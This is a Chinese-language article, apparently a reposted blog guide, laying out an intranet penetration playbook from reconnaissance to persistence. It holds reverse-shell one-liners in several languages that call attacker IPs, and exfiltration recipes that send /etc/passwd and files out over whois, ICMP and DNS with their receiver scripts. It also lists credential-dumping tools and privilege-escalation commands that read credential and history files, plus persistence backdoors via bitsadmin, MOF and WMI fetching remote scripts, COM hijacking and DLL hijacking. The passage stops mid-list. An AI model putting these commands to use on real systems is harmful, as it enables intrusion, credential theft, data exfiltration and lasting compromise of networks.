【內網滲透】整體思路及利用方法總結
VSole2021-08-28 09:52:56
日常內網滲透過程中,總體思路及方法應該是:
信息搜集:開源情報信息收集、創建企業密碼字典進入內網:基于企業弱賬號漏洞、基于系統漏洞進入、網站應用程序滲透隱匿攻擊:Command and Control、代理內網跨邊界應用:內網跨邊界轉發、內網跨邊界代理穿透、shell反彈等 內網信息搜集:本機信息搜集、擴散信息收集權限提升:Windows、 Linux 權限維持:系統后門、WEB后門橫向滲透:端口滲透、域滲透痕跡清理:Windows日志清除、破壞Windows日志記錄功能等
這樣一個路線,今天我們就按照這樣的路線一步步說明具體每一步需要怎么做。(小本本記起來。。。)
0x00 信息搜集
開源情報信息收集(OSINT)
github
Github_Nuggests(自動爬取Github上文件敏感信息泄露)https://github.com/az0ne/Github_Nuggests GSIL(能夠實現近實時(15分鐘內)的發現Github上泄露的信息)https://github.com/FeeiCN/GSIL x-patrol(小米團隊的):https://github.com/MiSecurity/x-patrol
whois查詢/注冊人反查/郵箱反查/相關資產
站長之家http://whois.chinaz.com/?DomainName=target.com&ws= 愛站https://whois.aizhan.com/target.com/ 微步在線https://x.threatbook.cn/ IP反查https://dns.aizhan.com/ 天眼查:https://www.tianyancha.com/ 虎媽查:http://www.whomx.com/ 歷史漏洞查詢 : 在線查詢:http://wy.zone.ci/ 自搭建:https://github.com/hanc00l/wooyun_publi/
google hacking
創建企業密碼字典
字典列表
passwordlist:https://github.com/lavalamp-/password-lists 豬豬俠字典:https://pan.baidu.com/s/1dFJyedzBlasting_dictionary(分享和收集各種字典,包括弱口令,常用密碼,目錄爆破。數據庫爆破,編輯器爆破,后臺爆破等) 針對特定的廠商,重點構造廠商相關域名的字典 ['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
密碼生成
GenpAss(中國特色的弱口令生成器: https://github.com/RicterZ/genpAss/ passmaker(可以自定義規則的密碼字典生成器) :https://github.com/bit4woo/passmaker pydictor(強大的密碼生成器) :https://github.com/LandGrey/pydictor
郵箱列表獲取
theHarvester :https://github.com/laramies/theHarvester 獲取一個郵箱以后導出通訊錄 LinkedInt :https://github.com/mdsecactivebreach/LinkedInt Mailget:https://github.com/Ridter/Mailget
泄露密碼查詢
ghostproject: https://ghostproject.fr/ pwndb: https://pwndb2am4tzkvold.onion.to/
對企業外部相關信息進行搜集
子域名獲取
Layer子域名挖掘機4.2紀念版 subDomainsBrute :https://github.com/lijiejie/subDomainsBrute wydomain :https://github.com/ring04h/wydomain Sublist3r :https://github.com/aboul3la/Sublist3r site:target.com:https://www.google.com Github代碼倉庫 抓包分析請求返回值(跳轉/文件上傳/app/api接口等) 站長幫手links等在線查詢網站 域傳送漏洞
Linux
dig @ns.example.com example=.com AXFR
Windows
nslookup -type=ns xxx.yyy.cn #查詢解析某域名的DNS服務器nslookup #進入nslookup交互模式server dns.domian.com #指定dns服務器ls xxx.yyy.cn #列出域信息GetDomainsBySSL.py :https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/ censys.io證書 :https://censys.io/certificates?q=target.com crt.sh證書查詢:https://crt.sh/?q=%25.target.com shadon :https://www.shodan.io/ zoomeye :https://www.zoomeye.org/ fofa :https://fofa.so/ censys:https://censys.io/ dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com community.riskiq.com :https://community.riskiq.com/Search/target.com subdomain3https://github.com/yanxiu0614/subdomain3 FuzzDomain :https://github.com/Chora10/FuzzDomain dnsdumpster.com :https://dnsdumpster.com/ phpinfo.me :https://phpinfo.me/domain/ dns開放數據接口 :https://dns.bufferover.run/dns?q=baidu.com
0x01進入內網
基于企業弱賬號漏洞
VPN(通過郵箱,密碼爆破,社工等途徑獲取VPN) 企業相關運維系統(zabbix等)
基于系統漏洞進入
Metasploit(漏洞利用框架):https://github.com/rapid7/metasploit-framework 漏洞利用腳本
網站應用程序滲透
SQL注入 跨站腳本(XSS) 跨站請求偽造(CSRF) SSRF(ssrf_proxy) 功能/業務邏輯漏洞 其他漏洞等 CMS-內容管理系統漏洞 企業自建代理
無線Wi-Fi接入
隱匿攻擊
Command and Control
ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icmp/ DNS :https://pentestlab.blog/2017/09/06/command-and-control-dns/ DropBox :https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ Gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/ Telegram :http://drops.xmd5.com/static/drops/tips-16142.html Twitter :https://pentestlab.blog/2017/09/26/command-and-control-twitter/ Website Keyword :https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ PowerShell :https://pentestlab.blog/2017/08/19/command-and-control-powershell/ Windows COM :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ WebDAV :https://pentestlab.blog/2017/09/12/command-and-control-webdav/ Office 365 :https://www.anquanke.com/post/id/86974 HTTPS :https://pentestlab.blog/2017/10/04/command-and-control-https/ Kernel :https://pentestlab.blog/2017/10/02/command-and-control-kernel/ Website :https://pentestlab.blog/2017/11/14/command-and-control-website/ WMI :https://pentestlab.blog/2017/11/20/command-and-control-wmi/ WebSocket :https://pentestlab.blog/2017/12/06/command-and-control-websocket/ Images :https://pentestlab.blog/2018/01/02/command-and-control-images/ Web Interface :https://pentestlab.blog/2018/01/03/command-and-control-web-interface/ JavaScript :https://pentestlab.blog/2018/01/08/command-and-control-javascript/ ...
Fronting
Domain FrontingTor_Fronting.
代理
VPN shadowsockts :https://github.com/shadowsocks HTTP :http://cn-proxy.com/ Tor
0x02 內網跨邊界應用
1、內網跨邊界轉發
NC端口轉發https://blog.csdn.net/l_f0rm4t3d/article/details/24004555 LCX端口轉發http://blog.chinaunix.net/uid-53401-id-4407931.html nps -> 個人用覺得比較穩定 ~https://github.com/cnlh/nps frphttps://github.com/fatedier/frp 代理腳本Tunnahttps://github.com/SECFORCE/TunnaReduhhttps://github.com/sensepost/reDuh...
2、內網跨邊界代理穿透
EW:
https://rootkiter.com/EarthWorm/
正向 SOCKS v5 服務器:
./ew -s ssocksd -l 1080
反彈 SOCKS v5 服務器: a) 先在一臺具有公網 ip 的主機A上運行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
b) 在目標主機B上啟動 SOCKS v5 服務 并反彈到公網主機的 8888端口
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
多級級聯
$ ./ew -s lcx_listen -l 1080 -e 8888$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
lcx_tran 的用法
$ ./ew -s ssocksd -l 9999$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
lcx_listen、lcx_slave 的用法
$ ./ew -s lcx_listen -l 1080 -e 8888$ ./ew -s ssocksd -l 9999$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
“三級級聯”的本地SOCKS測試用例以供參考
$ ./ew -s rcsocks -l 1080 -e 8888$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999$ ./ew -s lcx_listen -l 9999 -e 7777$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Termite(跳板機)
https://rootkiter.com/Termite/
使用說明:https://rootkiter.com/Termite/README.txt
代理腳本
reGeorg :https://github.com/sensepost/reGeorg
shell反彈
bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'java
r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()nc
#使用-e nc -e /bin/sh 223.8.200.234 1234#不使用-emknod /tmp/backpipe p/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipelua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
內網文件的傳輸和下載
wput
wput dir_name ftp://linuxpig:123456@host.com/
wget
wget http://site.com/1.rar -O 1.rar
ariac2(需安裝)
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
powershell
$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file","C:%homepath%file")
vbs腳本
Set args = Wscript.ArgumentsUrl = "http://domain/file"dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", Url, FalsexHttp.Sendwith bStrm.type = 1 '.open.write xHttp.responseBody.savetofile " C:\%homepath%\file", 2 'end with
執行 :cscript test.vbs
Perl
#!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");
執行:perl test.pl
Python
#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close()
執行:python test.py
Ruby
#!/usr/bin/rubyrequire 'net/http'Net::HTTP.start("www.domain.com") { |http|r = http.get("/file")open("save_location", "wb") { |file|file.write(r.body)}}
執行:ruby test.rb
PHP
$url = 'http://www.example.com/file';$path = '/path/to/file';$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$data = curl_exec($ch);curl_close($ch);file_put_contents($path, $data);?>
執行:php test.php
NC attacker
cat file | nc -l 1234
target
nc host_ip 1234 > file
FTP
ftp 127.0.0.1 username password get file exit
TFTP
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:%homepath%file
Window 文件共享
net use x: \127.0.0.1\share /user:example.comuserID myPassword
SCP 本地到遠程
scp file user@host.com:/tmp
遠程到本地
scp user@host.com:/tmp file
rsync 遠程rsync服務器中拷貝文件到本地機
rsync -av root@192.168.78.192::www /databack
本地機器拷貝文件到遠程rsync服務器
rsync -av /databack root@192.168.78.192::www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
copy
copy \\IP\ShareName\file.exe file.exe
WHOIS 接收端 Host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
發送端 Host A:
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
WHOIS + TARFirst:
ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it
Next
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally
cat files.b64 | tr -d '\r' | base64 -d | tar zxv #to get the files out
PING發送端:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端ping_receiver.py:
import sys
try: from scapy.all import *except: print("Scapy not found, please install scapy: pip install scapy") sys.exit(0)
def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 8: data = pkt[ICMP].load[-4:] print(f'{data.decode("utf-8")}', flush=True, end="", sep="")
sniff(iface="eth0", prn=process_packet)
python3 ping_receiver.py
DIG 發送端:
xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
接收端dns_reciver.py:
try: from scapy.all import *except: print("Scapy not found, please install scapy: pip install scapy")
def process_packet(pkt): if pkt.haslayer(DNS): domain = pkt[DNS][DNSQR].qname.decode('utf-8') root_domain = domain.split('.')[1] if root_domain.startswith('gooogle'): print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')
sniff(iface="eth0", prn=process_packet)
python3 dns_reciver.py...
搭建 HTTP server
python2
python -m SimpleHTTPServer 1337
python3
python -m http.server 1337
PHP 5.4+
php -S 0.0.0.0:1337
ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'ruby -run -e httpd . -p 1337
Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
busybox httpd
busybox httpd -f -p 8000
0x03 內網信息搜集
1、本機信息搜集
1、用戶列表
windows用戶列表 分析郵件用戶,內網[域]郵件用戶,通常就是內網[域]用戶
2、進程列表
析殺毒軟件/安全監控工具等 郵件客戶端 VPN ftp等
3、服務列表
與安全防范工具有關服務[判斷是否可以手動開關等] 存在問題的服務[權限/漏洞]
4、端口列表
開放端口對應的常見服務/應用程序[匿名/權限/漏洞等] 利用端口進行信息收集
5、補丁列表
分析 Windows 補丁 第三方軟件[Java/Oracle/Flash 等]漏洞
6、本機共享
本機共享列表/訪問權限 本機訪問的域共享/訪問權限
7、本用戶習慣分析
歷史記錄 收藏夾 文檔等
8、獲取當前用戶密碼工具
Windows
mimikatzhttps://github.com/gentilkiwi/mimikatz wcehttps://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64) Invoke-WCMDump https://github.com/peewpw/Invoke-WCMDump mimiDbg https://github.com/giMini/mimiDbg LaZagnehttps://github.com/AlessandroZ/LaZagne nirsoft_packagehttp://launcher.nirsoft.net/downloads/ QuarksPwDump fgdumphttps://github.com/quarkslab/quarkspwdump 星號查看器等
Linux
LaZagnehttps://github.com/AlessandroZ/LaZagne mimipenguinhttps://github.com/huntergregal/mimipenguin
2、擴散信息收集
端口掃描
常用端口掃描工具
nmaphttps://nmap.org masscanhttps://github.com/robertdavidgraham/masscan zmaphttps://github.com/zmap/zmap s掃描器 自寫腳本等 NC ...
內網拓撲架構分析
DMZ 管理網 生產網 測試網
常見信息收集命令
ipconfig:
ipconfig /all ------> 查詢本機 IP 段,所在域等
net:
net user ------> 本機用戶列表net localgroup administrators ------> 本機管理員[通常含有域用戶]net user /domain ------> 查詢域用戶net group /domain ------> 查詢域里面的工作組net group "domain admins" /domain ------> 查詢域管理員用戶組net localgroup administrators /domain ------> 登錄本機的域管理員net localgroup administrators workgroup\user001 /add ----->域用戶添加到本機 net group "Domain controllers" -------> 查看域控制器(如果有多臺)net view ------> 查詢同一域內機器列表 net view /domain ------> 查詢域列表net view /domain:domainname
dsquery
dsquery computer domainroot -limit 65535 && net group "domaincomputers" /domain ------> 列出該域內所有機器名dsquery user domainroot -limit 65535 && net user /domain------>列出該域內所有用戶名dsquery subnet ------>列出該域內網段劃分dsquery group && net group /domain ------>列出該域內分組 dsquery ou ------>列出該域內組織單位 dsquery server && net time /domain------>列出該域內域控制器 第三方信息收集 NETBIOS 信息收集 SMB 信息收集 空會話信息收集 漏洞信息收集等
0x04 權限提升
1、Windows
BypassUAC
常用方法
- 使用IFileOperation COM接口
- 使用Wusa.exe的extract選項
- 遠程注入SHELLCODE 到傀儡進程
- DLL劫持,劫持系統的DLL文件
- eventvwr.exe and registry hijacking
- sdclt.exe
- SilentCleanup
- wscript.exe
- cmstp.exe
- 修改環境變量,劫持高權限.Net程序
- 修改注冊表HKCU\Software\Classes\CLSID,劫持高權限程序
- 直接提權過UAC
常用工具
UACMEhttps://github.com/hfiref0x/UACME Bypass-UAChttps://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC Yamabikohttps://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko...
提權
- windows內核漏洞提權
檢測類:Windows-Exploit-Suggester:https://github.com/AonCyberLabs/Windows-Exploit-SuggesterWinSystemHelper:https://github.com/brianwrf/WinSystemHelperwesng:https://github.com/bitsadmin/wesng 利用類:windows-kernel-exploits:https://github.com/SecWiki/windows-kernel-exploitsBeRoot:https://github.com/AlessandroZ/BeRoot
- 服務提權
數據庫服務,ftp服務等
- WINDOWS錯誤系統配置
- 系統服務的錯誤權限配置漏洞
- 不安全的注冊表權限配置
- 不安全的文件/文件夾權限配置
- 計劃任務
- 任意用戶以NT AUTHORITY\SYSTEM權限安裝msi
- 提權腳本
PowerUP:https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1ElevateKit:https://github.com/rsmudge/ElevateKit
2、Linux
內核溢出提權
linux-kernel-exploits:https://github.com/SecWiki/linux-kernel-exploits
計劃任務
crontab -lls -alh /var/spool/cronls -al /etc/ | grep cronls -al /etc/cron*cat /etc/cron*cat /etc/at.allowcat /etc/at.denycat /etc/cron.allowcat /etc/cron.denycat /etc/crontabcat /etc/anacrontabcat /var/spool/cron/crontabs/root
SUID
find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;
系統服務的錯誤權限配置漏洞
cat /var/apache2/config.inccat /var/lib/mysql/mysql/user.MYDcat /root/anaconda-ks.cfg
不安全的文件/文件夾權限配置
cat ~/.bash_historycat ~/.nano_historycat ~/.atftp_historycat ~/.mysql_historycat ~/.php_history
找存儲的明文用戶名,密碼
grep -i user [filename]grep -i pass [filename]grep -C 5 "password" [filename]find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
0x05 權限維持
1、系統后門
Windows
1、密碼記錄工具
WinlogonHack WinlogonHack 是一款用來劫取遠程3389登錄密碼的工具,在 WinlogonHack 之前有 一個 Gina 木馬主要用來截取 Windows 2000下的密碼,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。鍵盤記錄器 安裝鍵盤記錄的目地不光是記錄本機密碼,是記錄管理員一切的密碼,比如說信箱,WEB 網頁密碼等等,這樣也可以得到管理員的很多信息。NTPass 獲取管理員口令,一般用 gina 方式來,但有些機器上安裝了 pcanywhere 等軟件,會導致遠程登錄的時候出現故障,本軟件可實現無障礙截取口令。Linux 下 openssh 后門 重新編譯運行的sshd服務,用于記錄用戶的登陸密碼。
2、常用的存儲Payload位置
WMI : 存儲:
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)$StaticClass.Name = 'Win32_Command'$StaticClass.Put()$StaticClass.Properties.Add('Command' , $Payload)$StaticClass.Put()
讀取:
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
包含數字簽名的PE文件利用文件hash的算法缺陷,向PE文件中隱藏Payload,同時不影響該PE文件的數字簽名特殊ADS…
type putty.exe > ...:putty.exewmic process call create c:\test\ads\...:putty.exe
特殊COM文件
type putty.exe > \\.\C:\test\ads\COM1:putty.exewmic process call create \\.\C:\test\ads\COM1:putty.exe
磁盤根目錄
type putty.exe >C:\:putty.exe wmic process call create C:\:putty.exe
3、Run/RunOnce Keys
用戶級
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
管理員
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 4、BootExecute Key
由于smss.exe在Windows子系統加載之前啟動,因此會調用配置子系統來加載當前的配置單元,具體注冊表鍵值為:
HKLM\SYSTEM\CurrentControlSet\Control\hivelistHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager
5、Userinit Key
WinLogon進程加載的login scripts,具體鍵值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 6、Startup Keys HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 7、Services
創建服務
sc create [ServerName] binPath= BinaryPathName
8、Browser Helper Objects
本質上是Internet Explorer啟動時加載的DLL模塊
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects 9、AppInit_DLLs
加載User32.dll會加載的DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs 10、文件關聯 HKEY_LOCAL_MACHINE\Software\ClassesHKEY_CLASSES_ROOT
11、bitsadmin(http://www.liuhaihua.cn/archives/357579.html)
bitsadmin /create backdoorbitsadmin /addfile backdoor %comspec% %temp%\cmd.exebitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"bitsadmin /Resume backdoor
12、mof(https://evi1cg.me/archives/Powershell_MOF_Backdoor.html)
pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name = "filtP1";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 1";QueryLanguage = "WQL";}; instance of ActiveScriptEventConsumer as $Consumer{Name = "consP1";ScriptingEngine = "JScript";ScriptText = "GetObject(\"script:https://host.com/test\")";}; instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};
管理員執行:
mofcomp test.mof
13、wmi
https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/
每隔60秒執行一次notepad.exe
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32otepad.exe",CommandLineTemplate="C:\Windows\System32otepad.exe"wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
14、Userland Persistence With Scheduled Tasks
https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/
劫持計劃任務UserTask,在系統啟動時加載dll
function Invoke-ScheduledTaskComHandlerUserTask{[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]Param ([Parameter(Mandatory = $True)][ValidateNotNullOrEmpty()][String]$Command,
[Switch]$Force)$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){New-Item $ScheduledTaskCommandPath -Force |New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null}else{Write-Verbose "Key already exists, consider using -Force"exit}
if (Test-Path $ScheduledTaskCommandPath) {Write-Verbose "Created registry entries to hijack the UserTask"}else{Write-Warning "Failed to create registry key, exiting"exit} }Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
15、Netsh
https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/
netsh add helper c:\testetshtest.dll
后門觸發:每次調用netsh
dll編寫:https://github.com/outflanknl/NetshHelperBeacon
16、Shim
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/
常用方式:InjectDll RedirectShortcut RedirectEXE
17、DLL劫持
https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/
通過Rattler自動枚舉進程,檢測是否存在可用dll劫持利用的進程 使用:Procmon半自動測試更精準,常規生成的dll會導致程序執行報錯或中斷,使用AheadLib配合生成dll劫持利用源碼不會影響程序執行 工具:https://github.com/sensepost/rattler工具:https://github.com/Yonsm/AheadLib
18、DoubleAgent
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/
編寫自定義Verifier provider DLL 通過Application Verifier進行安裝 注入到目標進程執行payload 每當目標進程啟動,均會執行payload,相當于一個自啟動的方式 POC :https://github.com/Cybellum/DoubleAgent
19、waitfor.exe
https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/
不支持自啟動,但可遠程主動激活,后臺進程顯示為waitfor.exe POC :https://github.com/3gstudent/Waitfor-Persistence
20、AppDomainManager
https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/
針對.Net程序,通過修改AppDomainManager能夠劫持.Net程序的啟動過程。如果劫持了系統常見.Net程序如powershell.exe的啟動過程,向其添加payload,就能實現一種被動的后門觸發機制
21、Office
劫持Office軟件的特定功能:
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/
通過dll劫持,在Office軟件執行特定功能時觸發后門利用VSTO實現的office后門Office加載項
- Word WLL
- Excel XLL
- Excel VBA add-ins
- PowerPoint VBA add-ins
參考1 :https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/
參考2 :https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/
22、CLR
https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/
無需管理員權限的后門,并能夠劫持所有.Net程序 POC:https://github.com/3gstudent/CLR-Injection
23、msdtc
https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/
利用MSDTC服務加載dll,實現自啟動,并繞過Autoruns對啟動項的檢測 利用:向 %windir%\system32\目錄添加dll并重命名為oci.dll
24、Hijack CAccPropServicesClass and MMDeviceEnumerato
https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/
利用COM組件,不需要重啟系統,不需要管理員權限 通過修改注冊表實現 POC:https://github.com/3gstudent/COM-Object-hijacking
25、Hijack explorer.exe
https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/
COM組件劫持,不需要重啟系統,不需要管理員權限 通過修改注冊表實現
HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}
26、Windows FAX DLL Injection
通過DLL劫持,劫持Explorer.exe對fxsst.dll的加載 Explorer.exe在啟動時會加載c:\Windows\System32\fxsst.dll(服務默認開啟,用于傳真服務)將payload.dll保存在c:\Windows\fxsst.dll,能夠實現dll劫持,劫持Explorer.exe對fxsst.dll的加載
27、特殊注冊表鍵值
在注冊表啟動項創建特殊名稱的注冊表鍵值,用戶正常情況下無法讀取(使用Win32 API),但系統能夠執行(使用Native API)。
《滲透技巧——"隱藏"注冊表的創建》
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/
《滲透技巧——"隱藏"注冊表的更多測試》
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/
28、快捷方式后門
替換我的電腦快捷方式啟動參數 POC :
https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1
29、Logon Scripts
